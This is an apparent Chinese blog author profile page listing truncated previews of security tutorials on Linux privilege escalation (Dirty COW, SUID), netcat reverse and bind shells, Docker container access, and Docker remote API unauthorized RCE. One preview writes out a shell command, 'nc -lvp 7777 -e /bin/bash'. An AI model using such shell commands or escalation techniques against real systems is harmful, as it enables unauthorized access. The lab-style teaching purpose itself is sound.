logo
publist
写文章

简介

该用户还未填写简介

擅长的技术栈

可提供的服务

暂无可提供的服务

权限提升-Linux脏牛内核漏洞&SUID&信息搜集

目录一、信息搜集二、Linux 提权 SUID【漏洞成因】:【查看suid和guid文件】:【其他命令】:【常用提权方式】:namp:findvi/vimlessmoremv /cpnanoawkmanwgetpythonperltcpdump三、内核漏洞提权演示【靶标】【工具】【提权测试】一、信息搜集提权自动化脚本利用两个信息收集:LinEnum,linuxpricchecker两个漏洞..

文章图片
#linux#安全#运维
NC反弹shell的几种方法

假如ubuntu、CentOS为目标服务器系统kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用最终是将ubuntu、CentOS的shell反弹到kali上正向反弹shellubuntu或者CentOS上面输入nc -lvp 7777 -e /bin/bashkali上输入nc ip 7777正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹s

文章图片
#linux#ubuntu#centos
Docker容器进入的4种方式(推荐最后一种)

在使用Docker创建了容器之后,大家比较关心的就是如何进入该容器了,其实进入Docker容器有好几多种方式,这里我们就讲一下常用的几种进入Docker容器的方法。进入Docker容器比较常见的几种做法如下:  Docker提供了attach命令来进入Docker容器。  接下来我们创建一个守护态的Docker容器,然后使用docker attach命令进入该容器。  然后我们使用docker p

文章图片
#大数据
漏洞复现-docker-unauthorized-rce

一、漏洞介绍1.1漏洞成因docker remote API未授权访问漏洞,此API主要目的是取代命令执行页面,开放2375监听容器时,会调用这个API。方便docker集群管理和扩展2.2环境准备靶机环境:192.168.xx.xxx (ubuntu)攻击环境:192.168.xx.xxx (kali)在靶机上使用复现漏洞环境。vulhub官网地址:https://vulhub.org二、漏洞检

文章图片
#安全#docker#容器
暂无文章信息